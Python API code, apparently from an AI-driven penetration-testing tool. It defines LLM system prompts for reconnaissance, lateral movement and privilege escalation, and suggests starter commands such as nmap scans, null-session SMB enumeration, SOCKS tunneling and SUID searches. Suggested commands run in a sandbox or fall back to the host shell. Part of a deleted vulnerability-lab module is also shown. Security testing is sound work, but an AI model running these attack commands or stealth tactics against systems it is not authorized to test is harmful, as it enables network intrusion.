"fingerprinting. Always suggest nmap flags appropriate for the situation, "
"explain output, and recommend next steps based on discovered services. "
"Prioritize stealth when asked and suggest timing/fragmentation options."
),
"initial_commands": [
"nmap -sn {target}",
"nmap -sV -sC -O -p- {target}",
"nmap -sU --top-ports 50 {target}",
],
},
"lateral_movement": {
"name": "Lateral Movement",
"description": "Pass-the-hash, SMB/WinRM pivoting, and SSH tunneling",
"system_prompt": (
"You are a lateral movement specialist. You help the operator pivot "
"through compromised networks using techniques such as pass-the-hash, "
"SMB relay, WinRM sessions, SSH tunneling, and SOCKS proxying. Always "
"verify credentials before attempting pivots, suggest cleanup steps, "
"and track which hosts have been compromised."
),
"initial_commands": [
"crackmapexec smb {target} -u '' -p ''",
"crackmapexec smb {target} --shares -u '' -p ''",
"ssh -D 1080 -N -f user@{target}",
],
},
"privilege_escalation": {
"name": "Privilege Escalation",
"description": "SUID binaries, kernel exploits, cron jobs, and writable paths",
"system_prompt": (
"You are a privilege escalation expert for Linux and Windows systems. "
"Guide the operator through enumeration of SUID/SGID binaries, kernel "
"version checks, misconfigured cron jobs, writable PATH directories, "
"sudo misconfigurations, and capability abuse. Suggest automated tools "
"like linpeas/winpeas when appropriate and explain each finding."
),
"initial_commands": [
"id && whoami && uname -a",
"find / -perm -4000 -type f 2>/dev/null",
"cat /etc/crontab && ls -la /etc/cron.*",
"echo $PATH | tr ':' '\\n' | xargs -I {} ls -ld {}",
],
},
"vpn_recon": {
"name": "VPN Reconnaissance",
"description": "VPN connection management and internal network discovery",
"system_prompt": (
"You are a VPN and internal network reconnaissance specialist. You "
"help the operator connect to target VPNs, verify tunnel status, "
"discover internal subnets, and enumerate services behind the VPN. "
"Always confirm connectivity before proceeding with scans and suggest "
"appropriate scope for internal reconnaissance."
),
"initial_commands": [
"openvpn --config client.ovpn --daemon",
"ip addr show tun0",
"ip route | grep tun",
"nmap -sn 10.0.0.0/24",
],
},
}
# ---------------------------------------------------------------------------
# Pydantic request / response models
# ---------------------------------------------------------------------------
class CreateSessionRequest(BaseModel):
template_id: Optional[str] = None
target: Optional[str] = ""
name: Optional[str] = ""
class MessageRequest(BaseModel):
message: str
class ExecuteCommandRequest(BaseModel):
command: str
execution_method: str = "sandbox" # "sandbox" or "direct"
class ExploitationStepRequest(BaseModel):
description: str
command: Optional[str] = ""
result: Optional[str] = ""
step_type: str = "recon" # recon | exploit | pivot | escalate | action
class SessionSummary(BaseModel):
session_id: str
name: str
target: str
template_id: Optional[str]
status: str
created_at: str
messages_count: int
commands_count: int
class MessageResponse(BaseModel):
role: str
response: str
timestamp: str
suggested_commands: List[str]
class CommandResult(BaseModel):
command: str
exit_code: int
stdout: str
stderr: str
duration: float
execution_method: str
timestamp: str
class VPNStatus(BaseModel):
connected: bool
ip: Optional[str] = None
interface: Optional[str] = None
container_name: Optional[str] = None
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _now_iso() -> str:
return datetime.now(timezone.utc).isoformat()
def _build_session(
session_id: str,
name: str,
target: str,
template_id: Optional[str],
) -> Dict:
return {
"session_id": session_id,
"name": name,
"target": target,
"template_id": template_id,
"status": "active",
"created_at": _now_iso(),
"messages": [],
"command_history": [],
"exploitation_path": [],
"vpn_status": {"connected": False, "ip": None},
"container_name": None,
"vpn_config_uploaded": False,
}
def _get_session(session_id: str) -> Dict:
session = terminal_sessions.get(session_id)
if not session:
raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
return session
def _build_context_string(
messages: List[Dict],
commands: List[Dict],
exploitation: List[Dict],
) -> str:
parts: List[str] = []
if messages:
parts.append("=== Recent Conversation ===")
for msg in messages:
role = msg.get("role", "unknown").upper()
parts.append(f"[{role}] {msg.get('content', '')}")
if commands:
parts.append("\n=== Recent Command Results ===")
for cmd in commands:
parts.append(
f"$ {cmd['command']}\n"
f"Exit code: {cmd['exit_code']}\n"
f"Stdout: {cmd['stdout'][:500]}\n"
f"Stderr: {cmd['stderr'][:300]}"
)
if exploitation:
parts.append("\n=== Exploitation Path ===")
for i, step in enumerate(exploitation, 1):
parts.append(
f"Step {i} [{step['step_type']}]: {step['description']}"
)
if step.get("command"):
parts.append(f" Command: {step['command']}")
if step.get("result"):
parts.append(f" Result: {step['result'][:300]}")
return "\n".join(parts)
def _extract_suggested_commands(text: str) -> List[str]:
"""Extract commands from backtick-fenced code blocks."""
# "shell" must be tried before "sh"; otherwise "sh" matches first and "ell" leaks into the block.
blocks = re.findall(r"```(?:bash|shell|sh)?\n?(.*?)```", text, re.DOTALL)
commands: List[str] = []
for block in blocks:
for line in block.strip().splitlines():
stripped = line.strip()
if stripped and not stripped.startswith("#"):
commands.append(stripped)
return commands
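A standalone sketch of the command extraction, with one detail worth calling out: in a regex alternation the first alternative that lets the whole pattern succeed wins, so `sh` listed before `shell` would consume only `sh` and leave `ell` as a bogus first command. The names `FENCE`, `_BLOCK_RE` and `extract_commands` are illustrative; the fence is built at runtime only to keep literal backtick runs out of this example.

```python
import re
from typing import List

FENCE = "`" * 3  # three backticks, built at runtime
_BLOCK_RE = re.compile(FENCE + r"(?:bash|shell|sh)?\n?(.*?)" + FENCE, re.DOTALL)


def extract_commands(text: str) -> List[str]:
    """Collect non-empty, non-comment lines from fenced code blocks."""
    commands: List[str] = []
    for block in _BLOCK_RE.findall(text):
        for line in block.strip().splitlines():
            stripped = line.strip()
            if stripped and not stripped.startswith("#"):
                commands.append(stripped)
    return commands
```

Fences tagged with a language outside the listed three (for example `python`) are still matched, and the tag itself ends up as the first extracted line; a stricter pattern would be needed to exclude those.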
# ---------------------------------------------------------------------------
# Template endpoints
# ---------------------------------------------------------------------------
@router.get("/templates")
async def list_templates():
"""List all available session templates."""
result = []
for tid, tmpl in TEMPLATES.items():
result.append({
"id": tid,
"name": tmpl["name"],
"description": tmpl["description"],
"initial_commands": tmpl["initial_commands"],
})
return result
# ---------------------------------------------------------------------------
# Session CRUD
# ---------------------------------------------------------------------------
@router.post("/session")
async def create_session(req: CreateSessionRequest):
"""Create a new terminal session, optionally from a template."""
session_id = str(uuid.uuid4())
target = req.target or ""
template_id = req.template_id
if template_id and template_id not in TEMPLATES:
raise HTTPException(status_code=400, detail=f"Unknown template: {template_id}")
name = req.name or (
TEMPLATES[template_id]["name"] if template_id else f"Session {session_id[:8]}"
)
session = _build_session(session_id, name, target, template_id)
# Provision a per-session Kali container (best-effort)
try:
from core.container_pool import get_pool
pool = get_pool()
sandbox = await pool.get_or_create(f"terminal-{session_id}", enable_vpn=True)
session_sandboxes[session_id] = sandbox
session["container_name"] = sandbox.container_name
except Exception as exc:
logger.warning(f"Failed to provision Kali container for terminal session: {exc}")
# Seed initial system message from template
if template_id:
tmpl = TEMPLATES[template_id]
session["messages"].append({
"role": "system",
"content": tmpl["system_prompt"],
"timestamp": _now_iso(),
"metadata": {"template": template_id},
})
# Provide initial suggested commands with target interpolated
initial_cmds = [
cmd.replace("{target}", target) for cmd in tmpl["initial_commands"]
]
session["messages"].append({
"role": "assistant",
"content": (
f"Session initialised with the **{tmpl['name']}** template.\n\n"
f"Target: `{target or '(not set)'}`\n\n"
"Suggested starting commands:\n"
+ "\n".join(f"```\n{c}\n```" for c in initial_cmds)
),
"timestamp": _now_iso(),
"suggested_commands": initial_cmds,
})
terminal_sessions[session_id] = session
return session
@router.get("/sessions")
async def list_sessions():
"""Return lightweight summaries of every session."""
summaries = []
for sid, s in terminal_sessions.items():
summaries.append(
SessionSummary(
session_id=sid,
name=s["name"],
target=s["target"],
template_id=s["template_id"],
status=s["status"],
created_at=s["created_at"],
messages_count=len(s["messages"]),
commands_count=len(s["command_history"]),
).model_dump()
)
return summaries
@router.get("/sessions/{session_id}")
async def get_session(session_id: str):
"""Return the full session including messages, commands, and exploitation path."""
return _get_session(session_id)
@router.delete("/sessions/{session_id}")
async def delete_session(session_id: str):
"""Delete a terminal session and its Kali container."""
if session_id not in terminal_sessions:
raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
# Destroy associated Kali container
sandbox = session_sandboxes.pop(session_id, None)
if sandbox:
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.destroy(f"terminal-{session_id}")
except Exception as exc:
logger.warning(f"Failed to destroy container for session {session_id}: {exc}")
del terminal_sessions[session_id]
return {"status": "deleted", "session_id": session_id}
# ---------------------------------------------------------------------------
# AI message interaction
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/message")
async def send_message(session_id: str, req: MessageRequest):
"""Send a user prompt to the AI and receive a response with suggested commands."""
session = _get_session(session_id)
user_message = req.message.strip()
if not user_message:
raise HTTPException(status_code=400, detail="Message content cannot be empty")
# Record user message
session["messages"].append({
"role": "user",
"content": user_message,
"timestamp": _now_iso(),
"metadata": {},
})
# Determine system prompt
template_id = session.get("template_id")
if template_id and template_id in TEMPLATES:
system_prompt = TEMPLATES[template_id]["system_prompt"]
else:
system_prompt = (
"You are an expert infrastructure penetration tester. Help the "
"operator plan and execute attacks against the target. Suggest "
"concrete commands, explain their purpose, and interpret output. "
"Always wrap commands in fenced code blocks so they can be extracted."
)
# Build context window
context_messages = session["messages"][-20:]
context_cmds = session["command_history"][-10:]
exploitation = session["exploitation_path"]
context = _build_context_string(context_messages, context_cmds, exploitation)
# Call LLM
try:
llm = LLMManager()
prompt = f"{context}\n\nUser: {user_message}"
response = await llm.generate(prompt, system_prompt)
except Exception as exc:
raise HTTPException(status_code=502, detail=f"LLM call failed: {exc}")
suggested_commands = _extract_suggested_commands(response)
# Record assistant response
session["messages"].append({
"role": "assistant",
"content": response,
"timestamp": _now_iso(),
"suggested_commands": suggested_commands,
})
return MessageResponse(
role="assistant",
response=response,
timestamp=session["messages"][-1]["timestamp"],
suggested_commands=suggested_commands,
).model_dump()
# ---------------------------------------------------------------------------
# Command execution
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/execute")
async def execute_command(session_id: str, req: ExecuteCommandRequest):
"""Execute a command in the Docker sandbox (fallback: direct shell)."""
session = _get_session(session_id)
command = req.command.strip()
if not command:
raise HTTPException(status_code=400, detail="Command cannot be empty")
start = time.time()
stdout = ""
stderr = ""
exit_code = -1
execution_method = "direct"
# Use requested execution method
use_sandbox = req.execution_method == "sandbox"
if use_sandbox:
# Prefer session's own Kali container
sandbox = session_sandboxes.get(session_id)
if sandbox and sandbox.is_available:
try:
result = await sandbox.execute_raw(command)
stdout = result.stdout
stderr = result.stderr
exit_code = result.exit_code
execution_method = "kali-sandbox"
except Exception as exc:
logger.warning(f"Session sandbox execution failed, trying fallback: {exc}")
# Fallback to shared sandbox
if execution_method == "direct":
try:
shared = await get_sandbox()
if shared and shared.is_available:
result = await shared.execute_raw(command)
stdout = result.stdout
stderr = result.stderr
exit_code = result.exit_code
execution_method = "sandbox"
except Exception as exc:
logger.warning(f"Shared sandbox execution failed, falling back to direct shell: {exc}")
# Fallback or direct execution requested
if execution_method not in ("kali-sandbox", "sandbox"):
try:
proc = await asyncio.create_subprocess_shell(
command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, raw_stderr = await asyncio.wait_for(
proc.communicate(), timeout=120
)
stdout = raw_stdout.decode(errors="replace")
stderr = raw_stderr.decode(errors="replace")
exit_code = proc.returncode or 0
execution_method = "direct"
except asyncio.TimeoutError:
proc.kill()  # do not leave the timed-out process running on the host
stderr = "Command timed out after 120 seconds"
exit_code = 124
except Exception as exc:
stderr = str(exc)
exit_code = 1
duration = round(time.time() - start, 3)
cmd_record = {
"command": command,
"exit_code": exit_code,
"stdout": stdout,
"stderr": stderr,
"duration": duration,
"execution_method": execution_method,
"timestamp": _now_iso(),
}
session["command_history"].append(cmd_record)
# Mirror into messages for AI context continuity
output_preview = stdout[:2000] if stdout else stderr[:2000]
session["messages"].append({
"role": "tool",
"content": f"$ {command}\n[exit {exit_code}] ({execution_method}, {duration}s)\n{output_preview}",
"timestamp": cmd_record["timestamp"],
"metadata": {"exit_code": exit_code, "execution_method": execution_method},
})
return CommandResult(**cmd_record).model_dump()
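The direct-execution fallback relies on `asyncio.wait_for` around `communicate()`. A minimal sketch of that pattern follows, with two deliberate differences that are assumptions of this example rather than the handler's behavior: it uses `create_subprocess_exec` with an argument list instead of a shell string, and it kills and reaps the child when the timeout fires. `run_with_timeout` is a hypothetical helper name.

```python
import asyncio
import sys
from typing import Sequence, Tuple


async def run_with_timeout(argv: Sequence[str], timeout: float) -> Tuple[int, str, str]:
    """Run argv and return (exit_code, stdout, stderr); exit code 124 on timeout."""
    proc = await asyncio.create_subprocess_exec(
        *argv,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    try:
        out, err = await asyncio.wait_for(proc.communicate(), timeout=timeout)
    except asyncio.TimeoutError:
        # wait_for only cancels the await; the child must be stopped explicitly.
        proc.kill()
        await proc.wait()
        return 124, "", f"Command timed out after {timeout} seconds"
    return proc.returncode or 0, out.decode(errors="replace"), err.decode(errors="replace")


if __name__ == "__main__":
    print(asyncio.run(run_with_timeout([sys.executable, "-c", "print('ok')"], 30)))
```

Passing an argument list avoids shell interpretation of the command string, at the cost of losing pipes and redirection; for an interactive pentest terminal the shell form may well be the intended trade-off.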
# ---------------------------------------------------------------------------
# Exploitation path
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/exploitation-path")
async def add_exploitation_step(session_id: str, req: ExploitationStepRequest):
"""Add a manual step to the exploitation path timeline."""
session = _get_session(session_id)
valid_types = {"recon", "exploit", "pivot", "escalate", "action"}
if req.step_type not in valid_types:
raise HTTPException(
status_code=400,
detail=f"step_type must be one of {sorted(valid_types)}",
)
step = {
"description": req.description,
"command": req.command or "",
"result": req.result or "",
"timestamp": _now_iso(),
"step_type": req.step_type,
}
session["exploitation_path"].append(step)
return step
@router.get("/sessions/{session_id}/exploitation-path")
async def get_exploitation_path(session_id: str):
"""Return the full exploitation path timeline."""
session = _get_session(session_id)
return session["exploitation_path"]
# ---------------------------------------------------------------------------
# VPN management
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/vpn/upload")
async def upload_vpn_config(
session_id: str,
ovpn_file: UploadFile = File(...),
username: Optional[str] = Form(None),
password: Optional[str] = Form(None),
):
"""Upload .ovpn config and optionally credentials into the session's container."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
if not sandbox or not sandbox.is_available:
raise HTTPException(
status_code=503,
detail="No Kali container available for this session.",
)
content = await ovpn_file.read()
if len(content) > 1_000_000:
raise HTTPException(status_code=400, detail="File too large (max 1MB)")
if not (ovpn_file.filename or "").endswith((".ovpn", ".conf")):
raise HTTPException(status_code=400, detail="File must be .ovpn or .conf")
# Upload config to container
dest = "/etc/openvpn/client.ovpn"
ok = await sandbox.upload_file(content, dest)
if not ok:
raise HTTPException(status_code=500, detail="Failed to upload config to container")
# Write auth file if credentials provided
if username and password:
auth_bytes = f"{username}\n{password}\n".encode()
await sandbox.upload_file(auth_bytes, "/etc/openvpn/auth.txt")
await sandbox._exec("chmod 600 /etc/openvpn/auth.txt", timeout=5)
await sandbox._exec(
"grep -q 'auth-user-pass' /etc/openvpn/client.ovpn || "
"echo 'auth-user-pass /etc/openvpn/auth.txt' >> /etc/openvpn/client.ovpn",
timeout=5,
)
await sandbox._exec(
"sed -i 's|auth-user-pass$|auth-user-pass /etc/openvpn/auth.txt|' /etc/openvpn/client.ovpn",
timeout=5,
)
session["vpn_config_uploaded"] = True
return {
"status": "uploaded",
"filename": ovpn_file.filename,
"credentials_set": bool(username and password),
}
@router.post("/sessions/{session_id}/vpn/connect")
async def connect_vpn(session_id: str):
"""Start VPN connection using previously uploaded config."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
if not sandbox or not sandbox.is_available:
raise HTTPException(status_code=503, detail="No Kali container for this session")
if not session.get("vpn_config_uploaded"):
raise HTTPException(status_code=400, detail="No VPN config uploaded. Upload .ovpn first.")
# Create TUN device
await sandbox._exec(
"mkdir -p /dev/net && "
"[ -c /dev/net/tun ] || mknod /dev/net/tun c 10 200; "
"chmod 600 /dev/net/tun",
timeout=5,
)
# Kill any existing VPN
await sandbox._exec("pkill -9 openvpn 2>/dev/null", timeout=5)
# Start OpenVPN
result = await sandbox._exec(
"openvpn --config /etc/openvpn/client.ovpn --daemon "
"--log /var/log/openvpn.log --writepid /var/run/openvpn.pid",
timeout=15,
)
if result.exit_code != 0:
raise HTTPException(
status_code=500,
detail=f"OpenVPN failed to start: {result.stderr or result.stdout}",
)
# Wait for tunnel (max 20s)
for _ in range(20):
await asyncio.sleep(1)
check = await sandbox._exec("ip addr show tun0 2>/dev/null", timeout=5)
if check.exit_code == 0 and "inet " in check.stdout:
match = re.search(r"inet\s+(\d+\.\d+\.\d+\.\d+)", check.stdout)
ip = match.group(1) if match else None
vpn = {"connected": True, "ip": ip}
session["vpn_status"] = vpn
return {"status": "connected", "ip": ip}
# Timeout
log_result = await sandbox._exec("tail -30 /var/log/openvpn.log 2>/dev/null", timeout=5)
raise HTTPException(
status_code=504,
detail=f"VPN connection timed out (20s). Log:\n{(log_result.stdout or '')[-500:]}",
)
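The tunnel check above reduces to pulling the first IPv4 address out of `ip addr show tun0` output. A small sketch of that parsing step, with a made-up sample string used purely for illustration (`tunnel_ipv4` and `_INET_RE` are hypothetical names):

```python
import re
from typing import Optional

_INET_RE = re.compile(r"inet\s+(\d+\.\d+\.\d+\.\d+)")


def tunnel_ipv4(ip_addr_output: str) -> Optional[str]:
    """Return the first IPv4 address in `ip addr` output, or None if absent."""
    match = _INET_RE.search(ip_addr_output)
    return match.group(1) if match else None
```

Because the pattern requires whitespace directly after `inet`, `inet6` lines are skipped, so an interface that has only a link-local IPv6 address is reported as not yet connected.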
@router.post("/sessions/{session_id}/vpn/disconnect")
async def disconnect_vpn(session_id: str):
"""Kill VPN connection inside the container."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
if not sandbox or not sandbox.is_available:
raise HTTPException(status_code=503, detail="No Kali container for this session")
await sandbox._exec(
"kill $(cat /var/run/openvpn.pid 2>/dev/null) 2>/dev/null; "
"pkill -9 openvpn 2>/dev/null",
timeout=10,
)
session["vpn_status"] = {"connected": False, "ip": None}
return {"status": "disconnected"}
# ---------------------------------------------------------------------------
# VPN status
# ---------------------------------------------------------------------------
@router.get("/sessions/{session_id}/vpn-status")
async def get_vpn_status(session_id: str):
"""Check VPN status inside the session's Kali container (fallback: host)."""
session = _get_session(session_id)
sandbox = session_sandboxes.get(session_id)
# Check inside container if available
if sandbox and sandbox.is_available:
vpn_data = await sandbox.get_vpn_status()
session["vpn_status"] = vpn_data
return VPNStatus(
connected=vpn_data["connected"],
ip=vpn_data.get("ip"),
interface=vpn_data.get("interface"),
container_name=sandbox.container_name,
).model_dump()
# Fallback: check on host (legacy behavior)
connected = False
ip_addr: Optional[str] = None
try:
proc = await asyncio.create_subprocess_shell(
"pgrep -a openvpn",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0 and raw_stdout.strip():
connected = True
except Exception:
pass
if connected:
try:
proc = await asyncio.create_subprocess_shell(
"ip addr show tun0",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0:
match = re.search(
r"inet\s+(\d+\.\d+\.\d+\.\d+)", raw_stdout.decode(errors="replace")
)
if match:
ip_addr = match.group(1)
except Exception:
pass
vpn = {"connected": connected, "ip": ip_addr}
session["vpn_status"] = vpn
return VPNStatus(**vpn).model_dump()
-876
@@ -1,876 +0,0 @@
"""
NeuroSploit v3 - Vulnerability Lab API Endpoints
Isolated vulnerability testing against labs, CTFs, and PortSwigger challenges.
Test individual vuln types one at a time and track results.
"""
from typing import Optional, Dict, List
from fastapi import APIRouter, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field
from datetime import datetime
from sqlalchemy import select, func, text
from backend.core.autonomous_agent import AutonomousAgent, OperationMode
from backend.core.vuln_engine.registry import VulnerabilityRegistry
from backend.db.database import async_session_factory
from backend.models import Scan, Target, Vulnerability, Endpoint, Report, VulnLabChallenge
# Import agent.py's shared dicts so ScanDetailsPage can find our scans
from backend.api.v1.agent import (
agent_results, agent_instances, agent_to_scan, scan_to_agent
)
router = APIRouter()
# In-memory tracking for running lab tests
lab_agents: Dict[str, AutonomousAgent] = {}
lab_results: Dict[str, Dict] = {}
# --- Request/Response Models ---
class VulnLabRunRequest(BaseModel):
target_url: str = Field(..., description="Target URL to test (lab, CTF, etc.)")
vuln_type: str = Field(..., description="Vulnerability type to test (e.g. xss_reflected)")
challenge_name: Optional[str] = Field(None, description="Name of the lab/challenge")
auth_type: Optional[str] = Field(None, description="Auth type: cookie, bearer, basic, header")
auth_value: Optional[str] = Field(None, description="Auth credential value")
custom_headers: Optional[Dict[str, str]] = Field(None, description="Custom HTTP headers")
notes: Optional[str] = Field(None, description="Notes about this challenge")
class VulnLabResponse(BaseModel):
challenge_id: str
agent_id: str
status: str
message: str
class VulnTypeInfo(BaseModel):
key: str
title: str
severity: str
cwe_id: str
category: str
# --- Vuln type categories for the selector ---
VULN_CATEGORIES = {
"injection": {
"label": "Injection",
"types": [
"xss_reflected", "xss_stored", "xss_dom",
"sqli_error", "sqli_union", "sqli_blind", "sqli_time",
"command_injection", "ssti", "nosql_injection",
]
},
"advanced_injection": {
"label": "Advanced Injection",
"types": [
"ldap_injection", "xpath_injection", "graphql_injection",
"crlf_injection", "header_injection", "email_injection",
"el_injection", "log_injection", "html_injection",
"csv_injection", "orm_injection",
]
},
"file_access": {
"label": "File Access",
"types": [
"lfi", "rfi", "path_traversal", "xxe", "file_upload",
"arbitrary_file_read", "arbitrary_file_delete", "zip_slip",
]
},
"request_forgery": {
"label": "Request Forgery",
"types": [
"ssrf", "csrf", "graphql_introspection", "graphql_dos",
]
},
"authentication": {
"label": "Authentication",
"types": [
"auth_bypass", "jwt_manipulation", "session_fixation",
"weak_password", "default_credentials", "two_factor_bypass",
"oauth_misconfig",
]
},
"authorization": {
"label": "Authorization",
"types": [
"idor", "bola", "privilege_escalation",
"bfla", "mass_assignment", "forced_browsing",
]
},
"client_side": {
"label": "Client-Side",
"types": [
"cors_misconfiguration", "clickjacking", "open_redirect",
"dom_clobbering", "postmessage_vuln", "websocket_hijack",
"prototype_pollution", "css_injection", "tabnabbing",
]
},
"infrastructure": {
"label": "Infrastructure",
"types": [
"security_headers", "ssl_issues", "http_methods",
"directory_listing", "debug_mode", "exposed_admin_panel",
"exposed_api_docs", "insecure_cookie_flags",
]
},
"logic": {
"label": "Business Logic",
"types": [
"race_condition", "business_logic", "rate_limit_bypass",
"parameter_pollution", "type_juggling", "timing_attack",
"host_header_injection", "http_smuggling", "cache_poisoning",
]
},
"data_exposure": {
"label": "Data Exposure",
"types": [
"sensitive_data_exposure", "information_disclosure",
"api_key_exposure", "source_code_disclosure",
"backup_file_exposure", "version_disclosure",
]
},
"cloud_supply": {
"label": "Cloud & Supply Chain",
"types": [
"s3_bucket_misconfig", "cloud_metadata_exposure",
"subdomain_takeover", "vulnerable_dependency",
"container_escape", "serverless_misconfiguration",
]
},
}
def _get_vuln_category(vuln_type: str) -> str:
    """Get category for a vuln type"""
    for cat_key, cat_info in VULN_CATEGORIES.items():
        if vuln_type in cat_info["types"]:
            return cat_key
    return "other"
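# Illustrative sketch, not part of the original module: the category lookup above
# scans every category list on each call. Assuming the mapping never changes at
# runtime, a reverse index built once gives the same answer with one dict lookup.
# SAMPLE_CATEGORIES and build_type_index are hypothetical names used only here.
from typing import Dict
SAMPLE_CATEGORIES = {
    "injection": {"label": "Injection", "types": ["xss_reflected", "sqli_error"]},
    "file_access": {"label": "File Access", "types": ["lfi", "xxe"]},
}
def build_type_index(categories: Dict[str, dict]) -> Dict[str, str]:
    """Map each vuln type to the first category that lists it."""
    index: Dict[str, str] = {}
    for cat_key, cat_info in categories.items():
        for vtype in cat_info["types"]:
            # setdefault keeps the first category, matching the linear scan
            index.setdefault(vtype, cat_key)
    return index
SAMPLE_INDEX = build_type_index(SAMPLE_CATEGORIES)
# Unknown types fall back to "other", as in the original helper:
# SAMPLE_INDEX.get("some_unknown_type", "other")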
# --- Endpoints ---
@router.get("/types")
async def list_vuln_types():
    """List all available vulnerability types grouped by category"""
    registry = VulnerabilityRegistry()
    result = {}
    for cat_key, cat_info in VULN_CATEGORIES.items():
        types_list = []
        for vtype in cat_info["types"]:
            info = registry.VULNERABILITY_INFO.get(vtype, {})
            types_list.append({
                "key": vtype,
                "title": info.get("title", vtype.replace("_", " ").title()),
                "severity": info.get("severity", "medium"),
                "cwe_id": info.get("cwe_id", ""),
                "description": (info.get("description") or "")[:120],
            })
        result[cat_key] = {
            "label": cat_info["label"],
            "types": types_list,
            "count": len(types_list),
        }
    return {"categories": result, "total_types": sum(len(c["types"]) for c in VULN_CATEGORIES.values())}
@router.post("/run", response_model=VulnLabResponse)
async def run_vuln_lab(request: VulnLabRunRequest, background_tasks: BackgroundTasks):
    """Launch an isolated vulnerability test for a specific vuln type"""
    import uuid
    # Validate vuln type exists
    registry = VulnerabilityRegistry()
    if request.vuln_type not in registry.VULNERABILITY_INFO:
        raise HTTPException(
            status_code=400,
            detail=f"Unknown vulnerability type: {request.vuln_type}. Use GET /vuln-lab/types for available types."
        )
    challenge_id = str(uuid.uuid4())
    agent_id = str(uuid.uuid4())[:8]
    category = _get_vuln_category(request.vuln_type)
    # Build auth headers
    auth_headers = {}
    if request.auth_type and request.auth_value:
        if request.auth_type == "cookie":
            auth_headers["Cookie"] = request.auth_value
        elif request.auth_type == "bearer":
            auth_headers["Authorization"] = f"Bearer {request.auth_value}"
        elif request.auth_type == "basic":
            import base64
            auth_headers["Authorization"] = f"Basic {base64.b64encode(request.auth_value.encode()).decode()}"
        elif request.auth_type == "header":
            if ":" in request.auth_value:
                name, value = request.auth_value.split(":", 1)
                auth_headers[name.strip()] = value.strip()
    if request.custom_headers:
        auth_headers.update(request.custom_headers)
    # Create DB record
    async with async_session_factory() as db:
        challenge = VulnLabChallenge(
            id=challenge_id,
            target_url=request.target_url,
            challenge_name=request.challenge_name,
            vuln_type=request.vuln_type,
            vuln_category=category,
            auth_type=request.auth_type,
            auth_value=request.auth_value,
            status="running",
            agent_id=agent_id,
            started_at=datetime.utcnow(),
            notes=request.notes,
        )
        db.add(challenge)
        await db.commit()
    # Init in-memory tracking (both local and in agent.py's shared dicts)
    vuln_info = registry.VULNERABILITY_INFO[request.vuln_type]
    lab_results[challenge_id] = {
        "status": "running",
        "agent_id": agent_id,
        "vuln_type": request.vuln_type,
        "target": request.target_url,
        "progress": 0,
        "phase": "initializing",
        "findings": [],
        "logs": [],
    }
    # Also register in agent.py's shared results dict so /agent/status works
    agent_results[agent_id] = {
        "status": "running",
        "mode": "full_auto",
        "started_at": datetime.utcnow().isoformat(),
        "target": request.target_url,
        "task": f"VulnLab: {vuln_info.get('title', request.vuln_type)}",
        "logs": [],
        "findings": [],
        "report": None,
        "progress": 0,
        "phase": "initializing",
    }
    # Launch agent in background
    background_tasks.add_task(
        _run_lab_test,
        challenge_id,
        agent_id,
        request.target_url,
        request.vuln_type,
        vuln_info.get("title", request.vuln_type),
        auth_headers,
        request.challenge_name,
        request.notes,
    )
    return VulnLabResponse(
        challenge_id=challenge_id,
        agent_id=agent_id,
        status="running",
        message=f"Testing {vuln_info.get('title', request.vuln_type)} against {request.target_url}"
    )
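# Illustrative sketch, not part of the original module: the auth-header logic from
# the /run endpoint, written as a pure function so it can be exercised without
# FastAPI or a database. build_auth_headers is a hypothetical name. It assumes a
# "basic" value has the form "user:password" and a "header" value the form
# "Name: value"; the endpoint itself does not validate either shape.
import base64
from typing import Dict, Optional
def build_auth_headers(
    auth_type: Optional[str],
    auth_value: Optional[str],
    custom_headers: Optional[Dict[str, str]] = None,
) -> Dict[str, str]:
    headers: Dict[str, str] = {}
    if auth_type and auth_value:
        if auth_type == "cookie":
            headers["Cookie"] = auth_value
        elif auth_type == "bearer":
            headers["Authorization"] = f"Bearer {auth_value}"
        elif auth_type == "basic":
            token = base64.b64encode(auth_value.encode()).decode()
            headers["Authorization"] = f"Basic {token}"
        elif auth_type == "header" and ":" in auth_value:
            # Split on the first colon only, so the value may contain colons
            name, value = auth_value.split(":", 1)
            headers[name.strip()] = value.strip()
    if custom_headers:
        # Custom headers are applied last and override any auth header of the same name
        headers.update(custom_headers)
    return headers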
async def _run_lab_test(
    challenge_id: str,
    agent_id: str,
    target: str,
    vuln_type: str,
    vuln_title: str,
    auth_headers: Dict,
    challenge_name: Optional[str] = None,
    notes: Optional[str] = None,
):
    """Background task: run the agent focused on a single vuln type"""
    logs = []
    findings_list = []
    scan_id = None
    async def log_callback(level: str, message: str):
        source = "llm" if any(tag in message for tag in ["[AI]", "[LLM]", "[USER PROMPT]", "[AI RESPONSE]"]) else "script"
        entry = {"level": level, "message": message, "time": datetime.utcnow().isoformat(), "source": source}
        logs.append(entry)
        # Update local tracking
        if challenge_id in lab_results:
            lab_results[challenge_id]["logs"] = logs
        # Also update agent.py's shared dict so /agent/logs works
        if agent_id in agent_results:
            agent_results[agent_id]["logs"] = logs
    async def progress_callback(progress: int, phase: str):
        if challenge_id in lab_results:
            lab_results[challenge_id]["progress"] = progress
            lab_results[challenge_id]["phase"] = phase
        if agent_id in agent_results:
            agent_results[agent_id]["progress"] = progress
            agent_results[agent_id]["phase"] = phase
    async def finding_callback(finding: Dict):
        findings_list.append(finding)
        if challenge_id in lab_results:
            lab_results[challenge_id]["findings"] = findings_list
        if agent_id in agent_results:
            agent_results[agent_id]["findings"] = findings_list
